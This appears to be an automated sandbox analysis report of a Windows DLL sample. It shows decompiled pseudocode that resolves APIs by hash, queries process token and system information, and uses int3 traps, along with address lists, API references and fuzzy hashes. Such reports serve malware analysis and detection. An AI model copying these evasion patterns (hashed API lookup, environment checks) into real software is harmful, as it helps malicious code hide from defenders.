									 *((intOrPtr*)(E6FC4F558(_t424 + 0x24, E6FC4F568(_t424 + 0x20) + 0xfffffffc))) =  *((intOrPtr*)(_t424 + 0x164 + _t397 * 4));
									_t397 = _t397 + 1;
									 *((intOrPtr*)(_t424 + 0x1c)) =  *((intOrPtr*)(_t424 + 0x1c)) + 1;
									__eflags = _t397 - 6;
								} while (_t397 < 6);
								_push(0);
								E6FC554EC(_t424 + 0xc, _t424 + 0x1c, 0x80000002);
								E6FC4F6F0(_t424 + 0x20);
								E6FC5551C(_t424 + 8, _t424 + 0x1c0, 0x5411b30);
								_t177 = E6FC557D0(_t424 + 4, __eflags,  *((intOrPtr*)(_t424 + 0x1c0)));
								_t398 = _t177;
								E6FC4E054(_t424 + 0x1c0);
								__eflags = _t177;
								if(_t177 != 0) {
									E6FC5551C(_t424 + 8, _t424 + 0x1c8, 0xdb1d9b48);
									_t413 = E6FC557D0(_t424 + 4, __eflags,  *((intOrPtr*)(_t424 + 0x1c8)));
									E6FC4E054(_t424 + 0x1c8);
									_t398 = _t424 + 0x1d0;
									E6FC5551C(_t424 + 8, _t424 + 0x1d0, 0xf3453dd0);
									_t392 = E6FC557D0(_t424 + 4, __eflags,  *(_t424 + 0x1d0));
									E6FC4E054(_t424 + 0x1d0);
									__eflags = _t413;
									if(_t413 != 0) {
										__eflags = _t413 - 5;
										if(_t413 != 5) {
											__eflags = _t413 - 2;
											if(_t413 != 2) {
												goto L58;
											} else {
												__eflags = _t392 - 1;
												if(_t392 != 1) {
													goto L58;
												} else {
													E6FC4D098(_t424 + 0xc);
													__eflags =  *((char*)(_t424 + 8));
													if( *((char*)(_t424 + 8)) != 0) {
														_t375 =  *(_t424 + 4);
														__eflags = _t375;
														if(_t375 == 0) {
															L53:
															_t237 = 1;
														} else {
															__eflags = _t375 - 0xffffffff;
															if(_t375 != 0xffffffff) {
																_t237 = 0;
																__eflags = 0;
															} else {
																goto L53;
															}
														}
														__eflags = _t237;
														if(_t237 == 0) {
															E6FC554C4(_t375);
														}
													}
													 *(_t424 + 4) = 0;
													_t186 = 5;
												}
											}
										} else {
											__eflags = _t392;
											if(_t392 != 0) {
												__eflags = _t392 - 1;
												if(_t392 == 1) {
													E6FC4D098(_t424 + 0xc);
													__eflags =  *((char*)(_t424 + 8));
													if( *((char*)(_t424 + 8)) != 0) {
														_t376 =  *(_t424 + 4);
														__eflags = _t376;
														if(_t376 == 0) {
															L108:
															_t240 = 1;
														} else {
															__eflags = _t376 - 0xffffffff;
															if(_t376 != 0xffffffff) {
																_t240 = 0;
																__eflags = 0;
															} else {
																goto L108;
															}
														}
														__eflags = _t240;
														if(_t240 == 0) {
															E6FC554C4(_t376);
														}
													}
													 *(_t424 + 4) = 0;
													_t186 = 4;
												} else {
													goto L58;
												}
											} else {
												E6FC4D098(_t424 + 0xc);
												__eflags =  *((char*)(_t424 + 8));
												if( *((char*)(_t424 + 8)) != 0) {
													_t377 =  *(_t424 + 4);
													__eflags = _t377;
													if(_t377 == 0) {
														L41:
														_t243 = 1;
													} else {
														__eflags = _t377 - 0xffffffff;
														if(_t377 != 0xffffffff) {
															_t243 = 0;
															__eflags = 0;
														} else {
															goto L41;
														}
													}
													__eflags = _t243;
													if(_t243 == 0) {
														E6FC554C4(_t377);
													}
												}
												 *(_t424 + 4) = 0;
												_t186 = 3;
											}
										}
									} else {
										__eflags = _t392;
										if(_t392 != 0) {
											L58:
											E6FC4D098(_t424 + 0xc);
											__eflags =  *((char*)(_t424 + 8));
											if( *((char*)(_t424 + 8)) != 0) {
												_t374 =  *(_t424 + 4);
												__eflags = _t374;
												if(_t374 == 0) {
													L61:
													_t234 = 1;
												} else {
													__eflags = _t374 - 0xffffffff;
													if(_t374 != 0xffffffff) {
														_t234 = 0;
														__eflags = 0;
													} else {
														goto L61;
													}
												}
												__eflags = _t234;
												if(_t234 == 0) {
													E6FC554C4(_t374);
												}
											}
											_t186 = 0;
											__eflags = 0;
											 *(_t424 + 4) = 0;
										} else {
											E6FC4D098(_t424 + 0xc);
											__eflags =  *((char*)(_t424 + 8));
											if( *((char*)(_t424 + 8)) != 0) {
												_t378 =  *(_t424 + 4);
												__eflags = _t378;
												if(_t378 == 0) {
													L31:
													_t246 = 1;
												} else {
													__eflags = _t378 - 0xffffffff;
													if(_t378 != 0xffffffff) {
														_t246 = 0;
														__eflags = 0;
													} else {
														goto L31;
													}
												}
												__eflags = _t246;
												if(_t246 == 0) {
													E6FC554C4(_t378);
												}
											}
											 *(_t424 + 4) = 0;
											_t186 = 2;
										}
									}
								} else {
									E6FC4D098(_t424 + 0xc);
									__eflags =  *((char*)(_t424 + 8));
									if( *((char*)(_t424 + 8)) != 0) {
										_t379 =  *(_t424 + 4);
										__eflags = _t379;
										if(_t379 == 0) {
											L21:
											_t250 = 1;
										} else {
											__eflags = _t379 - 0xffffffff;
											if(_t379 != 0xffffffff) {
												_t250 = 0;
												__eflags = 0;
											} else {
												goto L21;
											}
										}
										__eflags = _t250;
										if(_t250 == 0) {
											E6FC554C4(_t379);
										}
									}
									 *(_t424 + 4) = 0;
									_t186 = 1;
								}
							} else {
								_t186 = 1;
							}
							 *((intOrPtr*)( *0x6fc5d1f8 + 0x24)) = _t186;
							_t187 = E6FC510CC(0xffffffffffffffff);
							_t314 =  *0x6fc5d1f8;
							 *((char*)(_t314 + 0x29)) = _t187;
							__eflags =  *_t314 - 0x10;
							 *((intOrPtr*)(_t314 + 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x1d4));
							if( *_t314 >= 0x10) {
								__eflags = 0xffffffffffffffff;
								 *((intOrPtr*)( *0x6fc5d1f8 + 0x2c)) = E6FC51140(0xffffffffffffffff, _t392, _t398);
								goto L78;
							} else {
								 *(_t424 + 0x19c) = 0;
								_t364 = E6FC52F94(0xd0443458, 0xd8ece5ad, 0xd0443458, 0xd0443458);
								__eflags = _t364;
								if(_t364 == 0) {
									L74:
									_t196 =  *0x6fc5d1f8;
									__eflags =  *((char*)(_t196 + 0x28));
									if( *((char*)(_t196 + 0x28)) == 0) {
										 *((intOrPtr*)(_t196 + 0x2c)) = 3;
									} else {
										 *((intOrPtr*)(_t196 + 0x2c)) = 5;
									}
									goto L78;
								} else {
									_t198 =  *_t364(0xffffffff, 8, _t424 + 0x19c);
									__eflags = _t198;
									if(_t198 == 0) {
										_t199 = E6FC5352C(_t398);
										__eflags = _t199;
										if(_t199 != 0) {
											goto L74;
										} else {
											goto L69;
										}
									} else {
										L69:
										 *(_t424 + 0x30) =  *(_t424 + 0x19c);
										 *((char*)(_t424 + 0x34)) = 1;
										 *(_t424 + 0x1a4) = 0;
										_t319 = E6FC52F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
										__eflags = _t319;
										if(_t319 != 0) {
											_t232 =  *_t319( *(_t424 + 0x1ac), 1, 0, 0, _t424 + 0x1a4);
											__eflags = _t232;
											if(_t232 == 0) {
												E6FC5352C(_t398);
											}
										}
										_t202 =  *(_t424 + 0x1a4);
										__eflags = _t202;
										if(_t202 != 0) {
											E6FC4F620(_t424 + 0x18c, _t202);
											_t403 = E6FC52F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
											__eflags = _t403;
											if(_t403 == 0) {
												L124:
												E6FC4F6F0(_t424 + 0x188);
												goto L72;
											} else {
												_t208 = E6FC4F558(_t424 + 0x18c, 0);
												_t209 = E6FC4F568(_t424 + 0x188);
												_t211 =  *_t403( *(_t424 + 0x1ac), 1, _t208, _t209, _t424 + 0x1a4);
												__eflags = _t211;
												if(_t211 == 0) {
													_t212 = E6FC5352C(_t403);
													__eflags = _t212;
													if(_t212 != 0) {
														goto L124;
													} else {
														goto L116;
													}
												} else {
													L116:
													_t417 = E6FC4F558(_t424 + 0x18c, 0);
													E6FC4DFFC(_t424 + 0x1b4, 0);
													 *(_t424 + 0x1ac) = 0;
													_t369 = E6FC52F94(0xd0443458, 0x39521505, 0xd0443458, 0xd0443458);
													__eflags = _t369;
													if(_t369 != 0) {
														 *_t369( *_t417, _t424 + 0x1ac);
													}
													E6FC4E070(_t424 + 0x1b4,  *(_t424 + 0x1ac));
													_t219 = E6FC52F94(0x4bcc7cba, 0x1f221433, 0x4bcc7cba, 0x4bcc7cba);
													__eflags = _t219;
													if(_t219 == 0) {
														E6FC4E11C(_t424 + 0x1b8 - 8, _t424 + 0x1b8);
														_t419 = E6FC54BE0( *((intOrPtr*)(_t424 + 0x1b8)), E6FC4E94C( *((intOrPtr*)(_t424 + 0x1b8)), 0x7fffffff));
														E6FC4E054(_t424 + 0x1b8);
														E6FC4E054(_t424 + 0x1b0);
														E6FC4F6F0(_t424 + 0x188);
														__eflags =  *((char*)(_t424 + 0x34));
														if( *((char*)(_t424 + 0x34)) != 0) {
															E6FC4BC00(_t424 + 0x30);
														}
														__eflags = _t419 - 0x6df4cf7;
														if(_t419 != 0x6df4cf7) {
															goto L74;
														} else {
															 *((intOrPtr*)( *0x6fc5d1f8 + 0x2c)) = 6;
															L78:
															_t192 = E6FC52F94(0x4bcc7cba, 0x57154e4e, 0x4bcc7cba, 0x4bcc7cba);
															__eflags = _t192;
															if(_t192 != 0) {
																GetSystemInfo(_t424 + 0x164); // executed
															}
															_t152 =  *0x6fc5d1f8;
															_t284 = _t424 + 0x178;
															_t400 = _t424 + 0x170;
															 *((short*)(_t152 + 0xe)) =  *_t284;
															 *((intOrPtr*)(_t152 + 0x10)) =  *((intOrPtr*)(_t284 - 0x10));
															 *((intOrPtr*)(_t152 + 0x14)) =  *((intOrPtr*)(_t284 - 0xc));
															 *((intOrPtr*)(_t152 + 0x18)) =  *_t400;
															 *((intOrPtr*)(_t152 + 0x1c)) =  *((intOrPtr*)(_t400 + 0x10));
															goto L81;
														}
													} else {
														_push( *(_t424 + 0x1ac));
														asm("int3");
														return _t219;
													}
												}
											}
										} else {
											L72:
											__eflags =  *((char*)(_t424 + 0x34));
											if( *((char*)(_t424 + 0x34)) != 0) {
												E6FC4BC00(_t424 + 0x30);
											}
											goto L74;
										}
									}
								}
							}
						} else {
							_t254 =  *_t355(0xffffffff, 8, _t424 + 0x198);
							__eflags = _t254;
							if(_t254 == 0) {
								_t255 = E6FC5352C(_t395);
								__eflags = _t255;
								if(_t255 != 0) {
									goto L12;
								} else {
									goto L7;
								}
							} else {
								L7:
								 *(_t424 + 0x14) =  *(_t424 + 0x198);
								 *((char*)(_t424 + 0x18)) = 1;
								 *(_t424 + 0x1a0) = 0;
								_t257 = E6FC52F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
								__eflags = _t257;
								if(_t257 != 0) {
									_t280 = GetTokenInformation( *(_t424 + 0x1a8), 2, 0, 0, _t424 + 0x1a0); // executed
									__eflags = _t280;
									if(_t280 == 0) {
										E6FC5352C(_t395);
									}
								}
								_t258 =  *(_t424 + 0x1a0);
								__eflags = _t258;
								if(_t258 != 0) {
									E6FC4F620(_t424 + 0x3c, _t258);
									_t261 = E6FC52F94(0xd0443458, 0x377f4b05, 0xd0443458, 0xd0443458);
									_t395 = _t261;
									__eflags = _t261;
									if(_t261 == 0) {
										L98:
										E6FC4F6F0(_t424 + 0x38);
										goto L10;
									} else {
										_t264 = E6FC4F558(_t424 + 0x3c, 0);
										_t267 = GetTokenInformation( *(_t424 + 0x1a8), 2, _t264, E6FC4F568(_t424 + 0x38), _t424 + 0x1a0); // executed
										__eflags = _t267;
										if(_t267 == 0) {
											_t268 = E6FC5352C(_t395);
											__eflags = _t268;
											if(_t268 != 0) {
												goto L98;
											} else {
												goto L85;
											}
										} else {
											L85:
											_t421 = E6FC4F558(_t424 + 0x3c, 0);
											_t389 = _t424 + 0x1d8;
											 *(_t424 + 0x1d8 - 0x30) = 0;
											asm("movsd");
											asm("movsb");
											asm("movsb");
											_t395 = E6FC52F94(0xd0443458, 0xe6199b6e, 0xd0443458, 0xd0443458);
											__eflags = _t395;
											if(_t395 == 0) {
												goto L98;
											} else {
												_t272 = _t424 + 0x1a8;
												_t273 =  *_t395(_t272 + 0x30, 2, 0x20, 0x220, 0, 0, 0, 0, 0, 0, _t272);
												__eflags = _t273;
												if(_t273 == 0) {
													_t274 = E6FC5352C(_t395);
													__eflags = _t274;
													if(_t274 != 0) {
														goto L98;
													} else {
														goto L87;
													}
												} else {
													L87:
													_t389 =  *(_t424 + 0x1a8);
													__eflags =  *_t421;
													if( *_t421 <= 0) {
														L92:
														__eflags = _t389;
														if(_t389 == 0) {
															L94:
															_t385 = 1;
														} else {
															__eflags = _t389 - 0xffffffff;
															if(_t389 != 0xffffffff) {
																_t385 = 0;
																__eflags = 0;
															} else {
																goto L94;
															}
														}
														__eflags = _t385;
														if(_t385 == 0) {
															E6FC51070(_t389, _t395, _t389);
														}
														goto L98;
													} else {
														_t405 = 0;
														__eflags = 0;
														while(1) {
															_t278 = E6FC52F94(0xd0443458, 0x713d44b5, 0xd0443458, 0xd0443458);
															__eflags = _t278;
															if(_t278 != 0) {
																break;
															}
															_t405 = _t405 + 1;
															__eflags = _t405 -  *_t421;
															if(_t405 <  *_t421) {
																continue;
															} else {
																goto L92;
															}
															goto L130;
														}
														_push( *((intOrPtr*)(_t421 + 4 + _t405 * 8)));
														_push( *(_t424 + 0x1ac));
														asm("int3");
														return _t278;
													}
												}
											}
										}
									}
								} else {
									L10:
									__eflags =  *((char*)(_t424 + 0x18));
									if( *((char*)(_t424 + 0x18)) != 0) {
										E6FC4BC00(_t424 + 0x14);
									}
									goto L12;
								}
							}
						}
					} else {
						_push(_t408);
						asm("int3");
						return _t155;
					}
				} else {
					L81:
					return _t152;
				}
				L130:
			}

0x6fc507cc
0x6fc507cd
0x6fc507ce
0x6fc507d0
0x6fc507db
0x6fc507dd
0x6fc507e4
0x6fc51063
0x6fc51069
0x6fc51069
0x6fc507ee
0x6fc507fa
0x6fc50806
0x6fc5080b
0x6fc50818
0x6fc50822
0x6fc50829
0x6fc5082e
0x6fc50832
0x6fc50836
0x6fc5083b
0x6fc5083e
0x6fc50844
0x6fc5084a
0x6fc50857
0x6fc5085e
0x6fc50865
0x6fc50868
0x6fc5086b
0x6fc5086d
0x6fc50879
0x6fc50886
0x6fc50893
0x6fc50895
0x6fc50897
0x6fc50923
0x6fc50923
0x6fc50929
0x6fc5092c
0x6fc50931
0x6fc50934
0x6fc5094c
0x6fc5094d
0x6fc5094d
0x6fc5094d
0x6fc50951
0x6fc5095a
0x6fc5095f
0x6fc5095f
0x6fc50961
0x6fc50972
0x6fc50994
0x6fc50996
0x6fc50997
0x6fc5099b
0x6fc5099b
0x6fc509a4
0x6fc509b0
0x6fc509b9
0x6fc509cf
0x6fc509df
0x6fc509e4
0x6fc509e8
0x6fc509ed
0x6fc509ef
0x6fc50a3f
0x6fc50a54
0x6fc50a58
0x6fc50a5d
0x6fc50a6e
0x6fc50a83
0x6fc50a87
0x6fc50a8c
0x6fc50a8e
0x6fc50ad5
0x6fc50ad8
0x6fc50b26
0x6fc50b29
0x00000000
0x6fc50b2b
0x6fc50b2b
0x6fc50b2e
0x00000000
0x6fc50b30
0x6fc50b34
0x6fc50b39
0x6fc50b3e
0x6fc50b40
0x6fc50b44
0x6fc50b46
0x6fc50b4d
0x6fc50b4d
0x6fc50b48
0x6fc50b48
0x6fc50b4b
0x6fc50b51
0x6fc50b51
0x00000000
0x00000000
0x00000000
0x6fc50b4b
0x6fc50b53
0x6fc50b55
0x6fc50b58
0x6fc50b58
0x6fc50b55
0x6fc50b5d
0x6fc50b67
0x6fc50b67
0x6fc50b2e
0x6fc50ada
0x6fc50ada
0x6fc50adc
0x6fc50b1b
0x6fc50b1e
0x6fc50e90
0x6fc50e95
0x6fc50e9a
0x6fc50e9c
0x6fc50ea0
0x6fc50ea2
0x6fc50ea9
0x6fc50ea9
0x6fc50ea4
0x6fc50ea4
0x6fc50ea7
0x6fc50ead
0x6fc50ead
0x00000000
0x00000000
0x00000000
0x6fc50ea7
0x6fc50eaf
0x6fc50eb1
0x6fc50eb4
0x6fc50eb4
0x6fc50eb1
0x6fc50eb9
0x6fc50ec3
0x6fc50b24
0x00000000
0x6fc50b24
0x6fc50ade
0x6fc50ae2
0x6fc50ae7
0x6fc50aec
0x6fc50aee
0x6fc50af2
0x6fc50af4
0x6fc50afb
0x6fc50afb
0x6fc50af6
0x6fc50af6
0x6fc50af9
0x6fc50aff
0x6fc50aff
0x00000000
0x00000000
0x00000000
0x6fc50af9
0x6fc50b01
0x6fc50b03
0x6fc50b06
0x6fc50b06
0x6fc50b03
0x6fc50b0b
0x6fc50b15
0x6fc50b15
0x6fc50adc
0x6fc50a90
0x6fc50a90
0x6fc50a92
0x6fc50b6a
0x6fc50b6e
0x6fc50b73
0x6fc50b78
0x6fc50b7a
0x6fc50b7e
0x6fc50b80
0x6fc50b87
0x6fc50b87
0x6fc50b82
0x6fc50b82
0x6fc50b85
0x6fc50b8b
0x6fc50b8b
0x00000000
0x00000000
0x00000000
0x6fc50b85
0x6fc50b8d
0x6fc50b8f
0x6fc50b92
0x6fc50b92
0x6fc50b8f
0x6fc50b97
0x6fc50b97
0x6fc50b99
0x6fc50a98
0x6fc50a9c
0x6fc50aa1
0x6fc50aa6
0x6fc50aa8
0x6fc50aac
0x6fc50aae
0x6fc50ab5
0x6fc50ab5
0x6fc50ab0
0x6fc50ab0
0x6fc50ab3
0x6fc50ab9
0x6fc50ab9
0x00000000
0x00000000
0x00000000
0x6fc50ab3
0x6fc50abb
0x6fc50abd
0x6fc50ac0
0x6fc50ac0
0x6fc50abd
0x6fc50ac5
0x6fc50acf
0x6fc50acf
0x6fc50a92
0x6fc509f1
0x6fc509f5
0x6fc509fa
0x6fc509ff
0x6fc50a01
0x6fc50a05
0x6fc50a07
0x6fc50a0e
0x6fc50a0e
0x6fc50a09
0x6fc50a09
0x6fc50a0c
0x6fc50a12
0x6fc50a12
0x00000000
0x00000000
0x00000000
0x6fc50a0c
0x6fc50a14
0x6fc50a16
0x6fc50a19
0x6fc50a19
0x6fc50a16
0x6fc50a1e
0x6fc50a28
0x6fc50a28
0x6fc50936
0x6fc50938
0x6fc50938
0x6fc50ba2
0x6fc50ba5
0x6fc50baa
0x6fc50bac
0x6fc50bb5
0x6fc50bc1
0x6fc50bc4
0x6fc50c92
0x6fc50c9a
0x00000000
0x6fc50bca
0x6fc50bd4
0x6fc50be6
0x6fc50be8
0x6fc50bea
0x6fc50c76
0x6fc50c76
0x6fc50c78
0x6fc50c7c
0x6fc50c87
0x6fc50c7e
0x6fc50c7e
0x6fc50c7e
0x00000000
0x6fc50bf0
0x6fc50bfc
0x6fc50bfe
0x6fc50c00
0x6fc5104f
0x6fc51054
0x6fc51056
0x00000000
0x6fc5105c
0x00000000
0x6fc5105c
0x6fc50c06
0x6fc50c06
0x6fc50c17
0x6fc50c1b
0x6fc50c20
0x6fc50c32
0x6fc50c34
0x6fc50c36
0x6fc50c4d
0x6fc50c4f
0x6fc50c51
0x6fc50ec9
0x6fc50ec9
0x6fc50c51
0x6fc50c57
0x6fc50c5e
0x6fc50c60
0x6fc50edb
0x6fc50ef1
0x6fc50ef3
0x6fc50ef5
0x6fc51030
0x6fc51037
0x00000000
0x6fc50efb
0x6fc50f04
0x6fc50f12
0x6fc50f2c
0x6fc50f2e
0x6fc50f30
0x6fc51041
0x6fc51046
0x6fc51048
0x00000000
0x6fc5104a
0x00000000
0x6fc5104a
0x6fc50f36
0x6fc50f36
0x6fc50f44
0x6fc50f4f
0x6fc50f5e
0x6fc50f70
0x6fc50f72
0x6fc50f74
0x6fc50f81
0x6fc50f81
0x6fc50f91
0x6fc50fa2
0x6fc50fa7
0x6fc50fa9
0x6fc50fbf
0x6fc50fe0
0x6fc50fe9
0x6fc50ff5
0x6fc51001
0x6fc51006
0x6fc5100b
0x6fc51011
0x6fc51011
0x6fc51016
0x6fc5101c
0x00000000
0x6fc51022
0x6fc51024
0x6fc50c9d
0x6fc50ca9
0x6fc50cb0
0x6fc50cb2
0x6fc50cbc
0x6fc50cbc
0x6fc50cbe
0x6fc50cc0
0x6fc50ccf
0x6fc50cdb
0x6fc50cdf
0x6fc50ce2
0x6fc50ce5
0x6fc50ce8
0x00000000
0x6fc50ce8
0x6fc50fab
0x6fc50fab
0x6fc50fb2
0x6fc50fb3
0x6fc50fb3
0x6fc50fa9
0x6fc50f30
0x6fc50c66
0x6fc50c66
0x6fc50c66
0x6fc50c6b
0x6fc50c71
0x6fc50c71
0x00000000
0x6fc50c6b
0x6fc50c60
0x6fc50c00
0x6fc50bea
0x6fc5089d
0x6fc508a9
0x6fc508ab
0x6fc508ad
0x6fc50e7a
0x6fc50e7f
0x6fc50e81
0x00000000
0x6fc50e87
0x00000000
0x6fc50e87
0x6fc508b3
0x6fc508b3
0x6fc508c4
0x6fc508c8
0x6fc508cd
0x6fc508da
0x6fc508e1
0x6fc508e3
0x6fc508fa
0x6fc508fc
0x6fc508fe
0x6fc50cf6
0x6fc50cf6
0x6fc508fe
0x6fc50904
0x6fc5090b
0x6fc5090d
0x6fc50d05
0x6fc50d16
0x6fc50d1b
0x6fc50d1d
0x6fc50d1f
0x6fc50e50
0x6fc50e54
0x00000000
0x6fc50d25
0x6fc50d2b
0x6fc50d50
0x6fc50d52
0x6fc50d54
0x6fc50e6c
0x6fc50e71
0x6fc50e73
0x00000000
0x6fc50e75
0x00000000
0x6fc50e75
0x6fc50d5a
0x6fc50d5a
0x6fc50d65
0x6fc50d6c
0x6fc50d73
0x6fc50d7a
0x6fc50d7b
0x6fc50d7c
0x6fc50d8e
0x6fc50d90
0x6fc50d92
0x00000000
0x6fc50d98
0x6fc50d9a
0x6fc50db5
0x6fc50db7
0x6fc50db9
0x6fc50e5e
0x6fc50e63
0x6fc50e65
0x00000000
0x6fc50e67
0x00000000
0x6fc50e67
0x6fc50dbf
0x6fc50dbf
0x6fc50dbf
0x6fc50dc6
0x6fc50dca
0x6fc50e35
0x6fc50e35
0x6fc50e37
0x6fc50e3e
0x6fc50e3e
0x6fc50e39
0x6fc50e39
0x6fc50e3c
0x6fc50e42
0x6fc50e42
0x00000000
0x00000000
0x00000000
0x6fc50e3c
0x6fc50e44
0x6fc50e46
0x6fc50e4b
0x6fc50e4b
0x00000000
0x6fc50dcc
0x6fc50dcc
0x6fc50dcc
0x6fc50dce
0x6fc50dda
0x6fc50ddf
0x6fc50de1
0x00000000
0x00000000
0x6fc50e2f
0x6fc50e30
0x6fc50e33
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6fc50e33
0x6fc50de3
0x6fc50de7
0x6fc50dee
0x6fc50def
0x6fc50def
0x6fc50dca
0x6fc50db9
0x6fc50d92
0x6fc50d54
0x6fc50913
0x6fc50913
0x6fc50913
0x6fc50918
0x6fc5091e
0x6fc5091e
0x00000000
0x6fc50918
0x6fc5090d
0x6fc508ad
0x6fc5082b
0x6fc5082b
0x6fc5082c
0x6fc5082d
0x6fc5082d
0x6fc50ceb
0x6fc50ceb
0x6fc50cf5
0x6fc50cf5
0x00000000

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,D0443458,D0443458), ref: 6FC508FA
GetSystemInfo.KERNELBASE(?,4BCC7CBA,4BCC7CBA,?,?,F3453DD0,?,?,DB1D9B48,?,?,05411B30,00000000,80000002,00000000,-000000FC), ref: 6FC50CBC
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,D0443458,D0443458,00000000,D0443458,D0443458), ref: 6FC50D50

Memory Dump Source

Source File: 00000002.00000002.1044679417.000000006FC41000.00000020.00020000.sdmp, Offset: 6FC40000, based on PE: true

Associated: 00000002.00000002.1044641532.000000006FC40000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044767151.000000006FC5A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.1044782668.000000006FC5D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.1044790909.000000006FC5F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID:
API String ID: 298373132-0
Opcode ID: 31e8147fe13d680814e98e7a9df5e7f4fbed061bfa4433b3876b576d199c339c
Instruction ID: 7f7995477b16ff9fc894f3da8514770d8608c2efd1811cf43b7af1f789ba7f64
Opcode Fuzzy Hash: 31e8147fe13d680814e98e7a9df5e7f4fbed061bfa4433b3876b576d199c339c
Instruction Fuzzy Hash: BF22D470648342AEE721DB24C890BEF77A5AF8231CF10991DE4959B1D1FB70E839C75A

Uniqueness

Uniqueness Score: -1.00%

Function 6FC41494, Relevance: 1.9, Strings: 1, Instructions: 613
COMMONCrypto

Download Yara Rule

C-Code - Quality: 31%

			E6FC41494(intOrPtr __ecx, void* __edx, void* __eflags) {
				intOrPtr _v40;
				intOrPtr _v60;
				void* _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				char _v108;
				char _v112;
				char _v116;
				char _v120;
				char _v124;
				char _v128;
				char _v132;
				char _v136;
				char _v140;
				char _v144;
				char _v148;
				char _v152;
				char _v156;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				char _v180;
				char _v184;
				char _v188;
				char _v192;
				char _v196;
				char _v200;
				char _v204;
				char _v208;
				char _v212;
				char _v216;
				char _v220;
				char _v224;
				char _v228;
				char _v232;
				char _v236;
				char _v240;
				char _v244;
				char _v248;
				char _v252;
				char _v256;
				char _v260;
				char _v264;
				char _v268;
				char _v272;
				char _v276;
				void* _v288;
				intOrPtr _v292;
				char _v296;
				char _v300;
				char _v304;
				char _v308;
				char _v312;
				char _v316;
				char _v320;
				char _v324;
				char _v340;
				char _v344;
				char _v348;
				char _v352;
				char _v356;
				void* __ebp;
				void* _t282;
				intOrPtr* _t310;
				intOrPtr* _t318;
				intOrPtr* _t434;
				intOrPtr* _t480;
				void* _t481;

				_t481 = __eflags;
				_t480 =  &_v60;
				_v40 = __ecx;
				_v76 = 0;
				E6FC4F620( &_v72, 0);
				_v60 = 0x22dc1034;
				asm("pxor xmm0, xmm0");
				asm("movq [ecx+0x18], xmm0");
				E6FC4F8C4( &_v76, E6FC4F568( &_v76) + 0x10);
				E6FC4F558( &_v80, E6FC4F568( &_v80) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v88 = _v88 + 1;
				_t325 =  &_v84;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v84 + 0x10)) = 0x853cdd04;
				asm("movq [ecx+0x18], xmm0");
				E6FC4F8C4( &_v84, E6FC4F568(_t325) + 0x10);
				E6FC4F558( &_v88, E6FC4F568( &_v88) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v96 = _v96 + 1;
				_t329 =  &_v92;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v92 + 0x10)) = 0xb162dc4e;
				asm("movq [ecx+0x18], xmm0");
				E6FC4F8C4( &_v92, E6FC4F568(_t329) + 0x10);
				E6FC4F558( &_v96, E6FC4F568( &_v96) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v104 = _v104 + 1;
				_t333 =  &_v100;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v100 + 0x10)) = 0xc15ccc53;
				asm("movq [ecx+0x18], xmm0");
				E6FC4F8C4( &_v100, E6FC4F568(_t333) + 0x10);
				E6FC4F558( &_v104, E6FC4F568( &_v104) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v112 = _v112 + 1;
				_t337 =  &_v108;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v108 + 0x10)) = 0xc8fc2de6;
				asm("movq [ecx+0x18], xmm0");
				E6FC4F8C4( &_v108, E6FC4F568(_t337) + 0x10);
				E6FC4F558( &_v112, E6FC4F568( &_v112) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v120 = _v120 + 1;
				_t341 =  &_v116;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v116 + 0x10)) = 0x7d07f92f;
				asm("movq [ecx+0x18], xmm0");
				E6FC4F8C4( &_v116, E6FC4F568(_t341) + 0x10);
				E6FC4F558( &_v120, E6FC4F568( &_v120) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v128 = _v128 + 1;
				_t345 =  &_v124;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v124 + 0x10)) = 0xfc7fa539;
				asm("movq [ecx+0x18], xmm0");
				E6FC4F8C4( &_v124, E6FC4F568(_t345) + 0x10);
				E6FC4F558( &_v128, E6FC4F568( &_v128) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v136 = _v136 + 1;
				_t349 =  &_v132;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v132 + 0x10)) = 0x4145240a;
				asm("movq [ecx+0x18], xmm0");
				E6FC4F8C4( &_v132, E6FC4F568(_t349) + 0x10);
				E6FC4F558( &_v136, E6FC4F568( &_v136) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v144 = _v144 + 1;
				_t353 =  &_v140;
				asm("pxor xmm0, xmm0");
				 *((intOrPtr*)( &_v140 + 0x10)) = 0x2c2324e8;
				asm("movq [ecx+0x18], xmm0");
				E6FC4F8C4( &_v140, E6FC4F568(_t353) + 0x10);
				E6FC4F558( &_v144, E6FC4F568( &_v144) + 0xfffffff0);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_v152 = _v152 + 1;
